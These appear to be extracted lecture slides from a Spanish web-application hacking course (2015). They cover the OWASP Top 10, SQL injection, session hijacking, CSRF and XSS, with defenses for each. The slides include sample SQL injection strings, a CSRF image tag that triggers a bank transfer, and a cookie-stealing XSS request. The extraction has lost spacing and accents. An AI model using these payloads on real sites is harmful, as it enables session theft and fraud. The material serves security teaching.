Professional Documents
Culture Documents
HACKING
SCHOOL
HackingdeaplicacionesWeb
GabrielMaci Fernndez
Fundamentosdelaweb
CLIENTE
BROWSER
DATOS
PRIVADOS
SERVIDOR
HTTP
WEBSERVER
BASEDE
DATOS
13/03/2015
Interaccinconservidoresweb
URLs
http://gmacia:pass@www.ugr.es:80/descarga.php?file=prueba
.txt
Esquema
Autoridad:servidor(consultaDNS)
Camino
Argumentos
Interaccinconservidoresweb
13/03/2015
WEBAPPLICATIONATTACKS
OWASP
Briefhistory
OWASPTop10 2013
1. Injection
2. Brokenauthenticationandsession management
3. CrossSiteScripting(XSS)
4. InsecureDirectObjectReferences
5. SecurityMisconfiguration
6. SensitiveDataExposure
7. MissingFunctionLevelAccessControl
8. CrossSiteRequestForgery
9. Usingcomponentswithknownvulnerabilities
10. UnvalidateRedirectsandForwards
13/03/2015
INJECTIONATTACKS
Injectionattacks
Fundamento:datosnoconfiablessonenviadosa
unintrpretecomopartedeuncomandoo
consulta.
Algunostipos:
SQLinjection
LDAPinjection
Commandinjection
Hibernateinjection
XPATHinjection
LocalFileInclusion(LFI)
RemoteFileInclusion (RFI)
13/03/2015
SQL(StandardQuery Language)
Nombre
Password
Gabriel
gmacia@ugr.es
J3oldgs23
Juan
juan@ugr.es
Sdwe3342&
Luis
luis@ugr.es
34s3gsd23
13/03/2015
Cdigoenelservidor
SQLinjection
Gabriel OR 1=1); --
13/03/2015
Loprobamos?
Boolean exploitation
$Id=1'ANDASCII(SUBSTRING(username,1,1))=97AND'1'='1
Errorbased exploitation
INPUT:
id=10||UTL_INADDR.GET_HOST_NAME((SELECTuserFROM
DUAL))
OUTPUT:
ORA292257:hostSCOTTunknown
13/03/2015
Timedelayexploitation
id=10ANDIF(version()like5%,sleep(10),false))
13/03/2015
Escaping
Replaceproblematiccharacterswithsafeones
Changeto\
Libstodothis
Whitelisting
E.g.Integerwiththerightrange
13/03/2015
SESSIONHIJACKINGATTACKS
10
13/03/2015
StatefulHTTP
HTTPis stateless
Cookiesforimplementing statefulness
SessionHijacking
Knowing acookiegives you access with the
privileges ofthe user that established that
session
How tosteal session cookies
11
13/03/2015
Loprobamos?
Defenses
Unpredictability
Randomandlongcookies
Timeoutsessionsanddeletetokens
IPAddresscheck(Doubtfuldefense)
Maybeproblematic
ChangeofIPduetoDHCP,WIFIto3G
SameIPforNATboxes
12
13/03/2015
CROSSSITEREQUESTFORGERY
(CSRF)ATTACKS
Fundaments
Imaginethat
Auser is logged inwith an activesession cookie
This request is issued
http://banco.com/transfer?cant=6000&a=hacker
13
13/03/2015
CSRFattack
<img src=http://banco.com/transfer?cant=6000&a=hacker>
hacker.com
Cookie
browser
$$$
banco.com
Defenses
UsingREFERERfield
Problems:
Refererisoptional
Attackercanforcereferernottobesent
Maninthemiddle
Browservulnerability
Bounceuseroffofapageas:ftp://page
Usingsecretized links
http://website.com/algo.html?sid=81sdgs234e
14
13/03/2015
CROSSSITESCRIPTING(XSS)
ATTACKS
Sameoriginpolicy
JavaScriptenablesWeb2.0
Modifywebpages(DOM)
TrackEvents
Issuewebrequestsandmaintainconnections(AJAX)
Readandsetcookies
Browsersprovideisolationforjavascriptscripts
viatheSameOriginPolicy
OnlyScriptsreceivedfromawebpagesoriginhave
accesstothepageselements
15
13/03/2015
Stored XSSattack
GET http://banco.com/roba?c=document.cookie
hacker.com
1
browser
Inyecta
script
malicioso
4
Ejecutaelscript
Comosielservidor
noslohubiera
solicitado
banco.com
GET http://banco.com/transfer?cant=6000&a=hacker
Reflected XSSattack
hacker.com
browser
URLespecialmente
construidaparaelataque
5
Ejecutaelscript
Comosielservidor
noslohubiera
solicitado
banco.com
16
13/03/2015
Echoofuser input
The key:finding situations where aserver
echoes the user inputbackinthe HTML
response
Example:
GET http://victim.com/search.php?term=guitars
</body></html>
</body></html>
17
13/03/2015
Loprobamos?
Defenses
Sanitizing:remove executable portions of
userprovided input
Doneon many blogs.E.g.wordpress
https://wordpress.org/plugins/htmlpurified/
Blacklist vsWhitelist
18
13/03/2015
Elreto
Thanks to:
MichaelHicks for its nice examples about webattacks
19